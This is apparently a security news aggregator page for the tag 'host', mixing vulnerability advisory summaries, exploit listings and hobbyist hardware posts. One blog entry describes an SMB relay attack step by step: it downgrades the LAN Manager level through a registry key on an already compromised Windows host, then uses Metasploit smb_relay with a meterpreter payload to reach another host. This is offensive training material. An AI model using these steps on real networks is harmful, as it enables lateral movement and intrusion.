«
Expand/Collapse
116 items tagged "host"
Related tags:
usb [+],
red [+],
hat [+],
kvm [+],
symantec [+],
smart card reader [+],
objectivity [+],
design flaw [+],
authentication [+],
web [+],
site [+],
host mode [+],
web host [+],
vulnerability note [+],
ubuntu [+],
symantec pcanywhere [+],
smb [+],
pre [+],
phpmyadmin [+],
pcanywhere [+],
passport [+],
multi [+],
mihalism [+],
memory corruption [+],
host services [+],
host header [+],
cross site scripting [+],
code execution [+],
windows [+],
web servers [+],
variable [+],
usa [+],
todd miller [+],
telnet [+],
sudo [+],
ssh [+],
space component [+],
snort [+],
smb service [+],
service microsoft [+],
reply packets [+],
red hat enterprise [+],
privileged guest [+],
privilege escalation vulnerability [+],
pc to [+],
network interface card [+],
multithread [+],
monocle [+],
microsoft [+],
memory [+],
mac [+],
local privilege escalation [+],
list [+],
linux [+],
joomla [+],
ipv [+],
integration [+],
injection sites [+],
information disclosure vulnerability [+],
httprequest [+],
host memory [+],
host integration server [+],
header [+],
flaw [+],
django [+],
discovery [+],
denial of service [+],
dce rpc [+],
com [+],
botnet [+],
beta [+],
based buffer overflow [+],
arp requests [+],
arp request [+],
android [+],
Pentesting [+],
usb host [+],
text equivalents [+],
tar [+],
symantec antivirus corporate edition [+],
source ports [+],
security notice [+],
security [+],
response capabilities [+],
port [+],
lts [+],
linux kernel [+],
libvirt [+],
khc [+],
jeremy nickurak [+],
ipv6 host [+],
intrusion [+],
image host [+],
image [+],
host list [+],
forum host [+],
forum [+],
exploits [+],
easynet [+],
device [+],
design error [+],
default installation [+],
cracker [+],
bugtraq [+],
black hat [+],
backing store [+],
ams [+],
zipit [+],
wordpress [+],
wireless connectivity [+],
windows networks [+],
windows ids [+],
wii remote [+],
web interface [+],
web cams [+],
web applications [+],
wall street [+],
vm player [+],
virtual table [+],
videox [+],
validation [+],
utempter [+],
usb ports [+],
usb otg [+],
ugc [+],
u boot [+],
two windows [+],
turn key solution [+],
toy [+],
tomcat [+],
time analysis [+],
time [+],
third party software [+],
system call [+],
sven killig [+],
stock appearance [+],
stl files [+],
stefano zanero [+],
sql injection [+],
sophos [+],
someone [+],
software description [+],
slides [+],
simon inns [+],
shield [+],
setup [+],
servo [+],
security 2001 [+],
rsa [+],
risk factor [+],
revolutionary device [+],
reprap [+],
remote [+],
ps3 controllers [+],
prototyping projects [+],
propeller [+],
poc [+],
plugin version [+],
player [+],
pivots [+],
pic chips [+],
php sql [+],
photo host [+],
photo [+],
passive [+],
own tv show [+],
own [+],
nexus [+],
neat features [+],
nbsp [+],
nat [+],
mode [+],
misc [+],
micah dowty [+],
metasploit [+],
manuel [+],
malware [+],
log [+],
lego 8880 [+],
lego [+],
lan manager [+],
lan manager [+],
lan manager [+],
lan [+],
k auditing [+],
julian assange [+],
ipv6 stacks [+],
ipv6 networks [+],
ipv6 address [+],
intrusion prevention systems [+],
intrusion detection [+],
insufficient [+],
inclusion [+],
imgpals [+],
http [+],
host record [+],
host os [+],
host manager [+],
host ip [+],
host intrusion prevention [+],
host enumeration [+],
hobbiest [+],
his [+],
hardware modification [+],
handhelds [+],
ftp server [+],
ftp [+],
free workshops [+],
flood gates [+],
fake host [+],
f pic [+],
extra power [+],
eugene [+],
enumeration [+],
droid [+],
dongle [+],
domains [+],
detection [+],
deadbird [+],
cups [+],
cryptographic solutions [+],
cryptographers [+],
cross [+],
cpanel [+],
connection [+],
cnc [+],
classic [+],
cellphones [+],
bluetooth dongle [+],
betting man [+],
based intrusion detection [+],
autopwn [+],
auditing [+],
attacking [+],
arkadiusz [+],
arduino [+],
apache tomcat [+],
apache [+],
anomaly detection [+],
anomaly [+],
analysis [+],
address [+],
acls [+],
Support [+],
Rasberry [+],
General [+],
BackTrack [+],
vulnerability [+],
red hat security [+],
intel 64 [+],
hacks [+]
-
-
6:11
»
Carnal0wnage
Lately we have had a number of posts about our training classes, and I said I would put something technical up on the blog. In one of our classes, we teach students how to think like real bad guys and think beyond exploits. We teach how to examine a situation, how to handle that situation, and then how to capitalize on that situation. Recently on an engagement, I had to figure out how to exploit a domain-based account that could log into all Windows 7 hosts on the network, but there were network ACLs in place that prohibited SMB communications between the hosts. So, I turned to SMB relay to help me out. This vulnerability has plagued Windows networks for years, and with MS08-068 and NTLMv2, MS started to make things difficult. MS08-068 won't allow you to replay the hash back to the initial sender and get a shell, but it doesn’t stop you from being able to replay the hash to another host and get a shell – at least, it doesn’t stop you as long as the host isn't speaking NTMLv2! By default, Vista and up send NTMLv2 response only for the LAN Manager authentication level. This becomes problematic in newer networks, as seen in this screen shot from my first attempt to do SMB relay between two Windows 7 hosts:
In this scenario, we have host 192.168.0.14, which I have compromised and have discovered that the domain account
rgideon can probably authenticate into all Windows 7 hosts. We have applied unique Windows-based recon techniques that we teach in our class to determine this. We see that 192.168.0.13 is also a Windows 7 host, and we will look to authenticate into it, but we can't do it from the .14 host. There is a firewall between .13 and .14; so instead, we will attempt to do SMB Relay with host 192.168.0.15 as the bounce host.
So, what can we do in this scenario? We don't teach too much visual hacking in any of our classes, so everything must be done using shells, scripts, or something inconspicuous. In this situation, I did some research looking into the LAN Manager authentication protocol. I found a nice little registry key that doesn't exist by default in Vista and up, but if we put the registry key in place, then the LAN Manager authentication settings listen to the registry key. This happens on the fly; there are no reboots, logon/logoff's, etc. There is a caveat with this! You have to have administrator privileges on the first host! This scenario is about tactically exploiting networks and doing this the smart way.
Since we have a shell on our first host (192.168.0.14) and we have gotten it by migrating into processes, stealing tokens, etc., we can move a reg file with the following contents up to the first host.
This registry key is targeting the following path:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa.If we drop in a new DWORD value of 00000000, this will toggle the LAN Manager authentication level down to the absolute minimum, which will send LM and NTLM responses across the network. Now that we have the LAN Manager authentication value set to as low as it will go, we can capitalize on this.
Open a metasploit console (you will need admin privileges) on the host that will be set up as a bounce through host (192.168.0.15). With your msfconsole, use the exploit smb_relay and whatever payload you choose. I have chosen to use a reverse_https meterpreter. The screen shot below is an example of my settings:
Once all your settings are selected, exploit and get ready for the hard part. We need to get this account to attempt authentication to our bounce through the host with LAN Manager authentication. SMB relay in this setting is probably best used by getting the account you are targeting to visit your malicious host (192.168.0.15) through a UNC path (\\mybadhost\\share). Getting a user to do this is not something we will go into in this post. We reserve that type of thing for teaching at the class, but we have used this tactic, coupled with a few others, to compromise almost a whole Windows domain.
For brevity’s sake, we will just go ahead and simulate this activity by simply typing the following in the run dialogue box on the first victim host: (192.168.0.14) \\192.168.0.15\share\image.jpg.
I am not really hosting anything as a share on my host. I just need the LAN Manager authentication process to attempt authentication to my host (192.168.0.15). This attempt of authentication actually happens even by just typing \\192.168.0.15. With just the IP address entered, you will see authentication attempts to your host, but for large scale attacks, or something along those lines, it is best to have a full UNC path. Once the
rgideon account on host 192.168.0.14 starts authentication requests to our relay host 192.168.0.15, things will actually look as though they are being denied by the end host 192.168.0.13:
As you can see, we are receiving LAN Manager authentication requests from 192.168.0.14 and attempting to relay them to 192.168.0.13, but it looks as though they are being denied. This is a false negative. Type in sessions -l in your metasploit console, and you will see that you have a meterpreter session on 192.168.0.13.
This is a simple demonstration and exploit that we teach in some of our offensive-based classes. Our
Offensive Techniques is a class based on trying to show people real-world attacks coupled with unique approaches to compromising both Windows and Unix infrastructures.
Offensive Techniques has various sections in it that we have seen used in APT attacks, and the class also includes custom techniques built and used by Attack Research.
The goal of our training is to get you out of the mindset of traditional pen testing and show students how real offensive attacks really happen. We are hoping these types of concepts spread to the whole industry. When this happens we will be able to make an impact at the business level on how companies, governments, etc., make decisions based upon real security threats and a true security landscape. If you are interested in training that we released yesterday or have questions please visit our
site or email us at training@attackresearch.com with any questions.
R.
-
-
2:55
»
Packet Storm Security Exploits
Sites designed by Site2Host.com suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
-
-
8:01
»
Hack a Day
For being such a revolutionary device, there are still a few problems with the Raspberry Pi. For one, the USB host ports are only able to source 140 mA per port, while the USB ports on your desktop, laptop, and even tablet are able to send a full 500 mA per port. The official ‘fix’ [...]
-
-
14:24
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1234-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. This flaw did not affect the default use of KVM.
-
14:24
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-1234-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. This flaw did not affect the default use of KVM.
-
14:24
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-1234-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. This flaw did not affect the default use of KVM.
-
14:23
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-1233-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev packages form the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. When using qemu-kvm-rhev on a Red Hat Enterprise Linux 6 host not managed by Red Hat Enterprise Virtualization:
-
14:23
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-1233-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev packages form the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. When using qemu-kvm-rhev on a Red Hat Enterprise Linux 6 host not managed by Red Hat Enterprise Virtualization:
-
14:23
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-1233-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm-rhev packages form the user-space component for running virtual machines using KVM. A flaw was found in the way QEMU handled VT100 terminal escape sequences when emulating certain character devices. A guest user with privileges to write to a character device that is emulated on the host using a virtual console back-end could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host. When using qemu-kvm-rhev on a Red Hat Enterprise Linux 6 host not managed by Red Hat Enterprise Virtualization:
-
-
15:22
»
Packet Storm Security Exploits
Sites powered by code from 120host.net appear to suffer from a cross site scripting vulnerability. Note that this finding houses site-specific data.
-
7:05
»
Hack a Day
Joining the pantheon of other RepRap host software packages such as ReplicatorG, RepSnapper, and Skeinforge is Yet Another RepRap Host, a project by [Arkadiusz] that combines a lot of neat features into a very cool package. One thing we’ve really got to give [Arkadiusz] credit for is a virtual table that allows you to import several .STL files, place [...]
-
-
17:00
»
SecuriTeam
phpMyAdmin is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
-
-
17:05
»
Packet Storm Security Recent Files
This program uses multithreading to scan a range of IP addresses (IPv4) to find telnet/ssh and web servers. It then brute forces credentials against the host and upon success, will detect the type of host and execute commands.
-
17:05
»
Packet Storm Security Tools
This program uses multithreading to scan a range of IP addresses (IPv4) to find telnet/ssh and web servers. It then brute forces credentials against the host and upon success, will detect the type of host and execute commands.
-
17:05
»
Packet Storm Security Misc. Files
This program uses multithreading to scan a range of IP addresses (IPv4) to find telnet/ssh and web servers. It then brute forces credentials against the host and upon success, will detect the type of host and execute commands.
-
-
17:19
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0676-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for the standard Red Hat Enterprise Linux kernel. A flaw was found in the way the KVM_CREATE_IRQCHIP ioctl was handled. Calling this ioctl when at least one virtual CPU already existed could lead to a NULL pointer dereference later when the VCPU is scheduled to run. A malicious user in the kvm group on the host could use this flaw to crash the host. A flaw was found in the way device memory was handled during guest device removal. Upon successful device removal, memory used by the device was not properly unmapped from the corresponding IOMMU or properly released from the kernel, leading to a memory leak. A malicious user in the kvm group on the host who has the ability to assign a device to a guest could use this flaw to crash the host.
-
17:19
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0676-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for the standard Red Hat Enterprise Linux kernel. A flaw was found in the way the KVM_CREATE_IRQCHIP ioctl was handled. Calling this ioctl when at least one virtual CPU already existed could lead to a NULL pointer dereference later when the VCPU is scheduled to run. A malicious user in the kvm group on the host could use this flaw to crash the host. A flaw was found in the way device memory was handled during guest device removal. Upon successful device removal, memory used by the device was not properly unmapped from the corresponding IOMMU or properly released from the kernel, leading to a memory leak. A malicious user in the kvm group on the host who has the ability to assign a device to a guest could use this flaw to crash the host.
-
-
15:46
»
Packet Storm Security Recent Files
Ubuntu Security Notice 1442-1 - It was discovered that sudo incorrectly handled network masks when using Host and Host_List. A local user who is listed in sudoers may be allowed to run commands on unintended hosts when IPv4 network masks are used to grant access. A local attacker could exploit this to bypass intended access restrictions. Host and Host_List are not used in the default installation of Ubuntu.
-
15:46
»
Packet Storm Security Misc. Files
Ubuntu Security Notice 1442-1 - It was discovered that sudo incorrectly handled network masks when using Host and Host_List. A local user who is listed in sudoers may be allowed to run commands on unintended hosts when IPv4 network masks are used to grant access. A local attacker could exploit this to bypass intended access restrictions. Host and Host_List are not used in the default installation of Ubuntu.
-
5:01
»
Hack a Day
[ften] was having plenty of fun running Android on his HP Touchpad, but he soon discovered that the tablet’s micro USB port didn’t provide enough juice to his peripherals when running in host mode. He started digging around and found the perfect means of providing the extra power while maintaining the device’s stock appearance. He [...]
-
16:34
»
Packet Storm Security Misc. Files
Joomla version 2.5.3 suffers from a host header cross site scripting vulnerability.
-
-
17:20
»
Packet Storm Security Misc. Files
IPv6 offers a much larger address space than that of its IPv4 counterpart. The standard /64 IPv6 subnets can (in theory) accommodate approximately 1.844 * 10^19 hosts, thus resulting in a much lower host density (#hosts/#addresses) than their IPv4 counterparts. As a result, it is widely assumed that it would take a tremendous effort to perform host scanning attacks against IPv6 networks, and therefore IPv6 host scanning attacks have long been considered unfeasible. This document analyzes the IPv6 address configuration policies implemented in most popular IPv6 stacks, and identifies a number of patterns in the resulting addresses lead to a tremendous reduction in the host address search space, thus dismantling the myth that IPv6 host scanning attacks are unfeasible.
-
-
18:32
»
Packet Storm Security Exploits
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
-
18:32
»
Packet Storm Security Recent Files
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
-
18:32
»
Packet Storm Security Misc. Files
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
-
-
1:14
»
Packet Storm Security Headlines
If I had a quarter every time someone contacted us saying "look what I've hacked, please let the world know", I would probably have... well, let's just say I probably wouldn't have to work for a few weeks. It's rare that a compromise impresses me. It's not to say that it doesn't take special talent to commit the offense, it's just that such offenses are pretty common place and usually have poor motives. Truth is, on a long enough timeline and with the right resources, anything can be compromised. Even when someone bumps a power cord and causes our systems to reboot, my nerves shatter to a point that our forensic investigation over the matter can turn into a quagmire worse than a congressional hearing into fraud on Wall Street. This evening I received some tweets to our account noting that 22 sites on Dream Host have been compromised. Considering the sites are not well known, it is not really that significant nor something we would normally publish an article over. However, I spent five seconds looking over the pastebin and noticed something interesting. The sites in question are primarily tax or fiscal related. If I was a betting man, I would venture to guess that all of these sites are sharing the same vulnerable third party software to run their business. So, if you are on the list at , I strongly suggest you look at what third party code you have installed and reinstall your OS, shelf the turn-key solution, and take the time to write code that keeps your system and your users secure.
-
-
11:01
»
Hack a Day
With the coming of Android 3.1 you finally have the option of using the device as a USB host. This may be through a USB OTG (On-the-Go) adaptor, but nonetheless it’s a feature which was sorely missed until now. [Manuel] put together a guide on using Android as a USB host. As you can see, [...]
-
-
15:00
»
Sophos security news
Sophos and world-renowned cryptographers host free workshops on cutting-edge cryptographic solutions at RSA Conference 2012
-
-
20:16
»
Packet Storm Security Advisories
Red Hat Security Advisory 2012-0051-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for the standard Red Hat Enterprise Linux kernel. A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. A flaw was found in the way the KVM subsystem of a Linux kernel handled PIT IRQs when there was no virtual interrupt controller set up. A malicious user in the kvm group on the host could force this situation to occur, resulting in the host crashing.
-
20:16
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2012-0051-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for the standard Red Hat Enterprise Linux kernel. A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. A flaw was found in the way the KVM subsystem of a Linux kernel handled PIT IRQs when there was no virtual interrupt controller set up. A malicious user in the kvm group on the host could force this situation to occur, resulting in the host crashing.
-
20:16
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2012-0051-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. KVM is a Linux kernel module built for the standard Red Hat Enterprise Linux kernel. A heap overflow flaw was found in the way QEMU-KVM emulated the e1000 network interface card. A privileged guest user in a virtual machine whose network interface is configured to use the e1000 emulated driver could use this flaw to crash the host or, possibly, escalate their privileges on the host. A flaw was found in the way the KVM subsystem of a Linux kernel handled PIT IRQs when there was no virtual interrupt controller set up. A malicious user in the kvm group on the host could force this situation to occur, resulting in the host crashing.
-
-
15:59
»
Packet Storm Security Advisories
Red Hat Security Advisory 2011-1801-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
-
15:59
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2011-1801-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
-
15:59
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2011-1801-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
-
-
17:01
»
Packet Storm Security Advisories
Red Hat Security Advisory 2011-1777-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
-
17:01
»
Packet Storm Security Recent Files
Red Hat Security Advisory 2011-1777-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
-
17:01
»
Packet Storm Security Misc. Files
Red Hat Security Advisory 2011-1777-01 - KVM is a full virtualization solution for Linux on AMD64 and Intel 64 systems. qemu-kvm is the user-space component for running virtual machines using KVM. A flaw was found in the way qemu-kvm handled VSC_ATR messages when a guest was configured for a CCID USB smart card reader in passthrough mode. An attacker able to connect to the port on the host being used for such a device could use this flaw to crash the qemu-kvm process on the host or, possibly, escalate their privileges on the host.
-
-
13:22
»
Carnal0wnage
Need to check a few specifc nessus plugins against a host?
$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107
Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...
Host 192.168.1.92 is up
Discovered open port http (80/tcp) on 192.168.1.92
[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92
+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also :
http://www.microsoft.com/Sharepoint/default.mspx Solution : Make sure the proper access controls are put in place
Risk factor : None
Plugin output : The following instance of SharePoint was detected on the remote host :
Version : 12.0.0.6327
URL : http://192.168.1.92/
looks like the functionality has been there for awhile:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html
-
-
13:13
»
SecDocs
Authors:
Christiaan Schade Damiano Bolzoni Tags:
malware malware analysis Event:
Black Hat USA 2010 Abstract: In this presentation we will show a new approach to perform on-the-fly malware analysis (even of previously unknown malware), without the need of deploying any instrumentation at the end host before hand. Our approach leverages the fact that malware quite often comes as a small (in size) "spore", which is then responsible for making the malware persistent on the targeted host and download additional components ("eggs"). Eggs usually come in the shape of executables or DLLs, and extend the capabilities of the spore (password grabbing, URL redirection, etc.) Our system, we call it Avatar, detect failed attempts to download eggs, and ships back to the suspected malware what we call a "red pill". When the malware executes the red pill, this performs some preliminary checks and can send to an instrumented host a copy of the parent process' executable. In this instrumented (i.e., sand-boxed) environment it is possible to perform real-time analysis of the suspicious program. The red pill can be then remotely instrumented to terminate the monitored process, in case it appears to be a real threat. By doing so, it is possible to effectively contain a large infection.
-
-
19:32
»
Packet Storm Security Exploits
Microsoft Host Integration Server versions 8.5.4224.0 and below suffer from various denial of service vulnerabilities. Proof of concept code included.
-
19:32
»
Packet Storm Security Recent Files
Microsoft Host Integration Server versions 8.5.4224.0 and below suffer from various denial of service vulnerabilities. Proof of concept code included.
-
19:32
»
Packet Storm Security Misc. Files
Microsoft Host Integration Server versions 8.5.4224.0 and below suffer from various denial of service vulnerabilities. Proof of concept code included.
-
-
16:39
»
Packet Storm Security Recent Files
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
16:39
»
Packet Storm Security Tools
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
16:39
»
Packet Storm Security Misc. Files
Monocle is a local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. Written to work on both Linux and FreeBSD.
-
-
22:27
»
Packet Storm Security Exploits
The WordPress x7Host's Videox7 UGC plugin version 2.5.3.2 suffers from a reflective cross site scripting vulnerability.
-
-
14:49
»
Packet Storm Security Exploits
Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably it's other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.
-
14:49
»
Packet Storm Security Recent Files
Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably it's other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.
-
14:49
»
Packet Storm Security Misc. Files
Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably it's other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.
-
-
11:19
»
Packet Storm Security Exploits
Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably it's other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.
-
11:19
»
Packet Storm Security Recent Files
Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably it's other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.
-
11:19
»
Packet Storm Security Misc. Files
Objectivity/DB includes many different tools for administration. The problem is, anyone can use these tools to perform operations on the host running the lock server, advanced multithreaded server, and probably it's other servers as well, without any authentication. This design flaw puts the host running these servers at risk of potentially unauthorized operations being performed on the system, locally or remotely. This exploit demonstrates this issue and was tested on Objectivity/DB 10 running on Windows.
-
-
23:02
»
Packet Storm Security Recent Files
Ubuntu Security Notice 1008-1 - It was discovered that libvirt would probe disk backing stores without consulting the defined format for the disk. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue only affected Ubuntu 10.04 LTS. By default, guests are confined by an AppArmor profile which provided partial protection against this flaw. It was discovered that libvirt would create new VMs without setting a backing store format. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue did not affect Ubuntu 8.04 LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile which provided partial protection against this flaw. Jeremy Nickurak discovered that libvirt created iptables rules with too lenient mappings of source ports. A privileged attacker in the guest could bypass intended restrictions to access privileged resources on the host.
-
23:00
»
Packet Storm Security Advisories
Ubuntu Security Notice 1008-1 - It was discovered that libvirt would probe disk backing stores without consulting the defined format for the disk. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue only affected Ubuntu 10.04 LTS. By default, guests are confined by an AppArmor profile which provided partial protection against this flaw. It was discovered that libvirt would create new VMs without setting a backing store format. A privileged attacker in the guest could exploit this to read arbitrary files on the host. This issue did not affect Ubuntu 8.04 LTS. In Ubuntu 9.10 and later guests are confined by an AppArmor profile which provided partial protection against this flaw. Jeremy Nickurak discovered that libvirt created iptables rules with too lenient mappings of source ports. A privileged attacker in the guest could bypass intended restrictions to access privileged resources on the host.
-
-
9:21
»
Hack a Day
This USB to Zipit Dock adapter and a special kernel makes USB host mode for the Zipit possible. Previously, the cheap and hackable wireless client needed a hardware modification to enable USB support. The new kernel bootloader, called U-Boot, makes the internal alterations unnecessary (see the demo after the break). Now the only caveat is one [...]
-
-
12:00
»
Hack a Day
[Deadbird] decided to use a LEGO 8880 Super Car as a host for all of his electronic tinkering. Throughout his blog (translated) you’ll find the vehicle with an Arduino MEGA interfacing various prototyping bits. It starts with the motors for locomotion, closely followed by a servo for steering. From there we see the addition of [...]
-
-
20:34
»
Packet Storm Security Recent Files
The Symantec Antivirus Corporate Edition AMS Intel Alert Handler service (hndlrsvc.exe) provides alert setup and response capabilities to AMS2. A design error in Symantec's implementation of this function allows an attacker who can establish a TCP connection to port 38292, on a vulnerable host to execute commands at system level on that host. Versions 10.1.8.8000 and below are affected.
-
20:33
»
Packet Storm Security Advisories
The Symantec Antivirus Corporate Edition AMS Intel Alert Handler service (hndlrsvc.exe) provides alert setup and response capabilities to AMS2. A design error in Symantec's implementation of this function allows an attacker who can establish a TCP connection to port 38292, on a vulnerable host to execute commands at system level on that host. Versions 10.1.8.8000 and below are affected.
-
-
9:00
»
Hack a Day
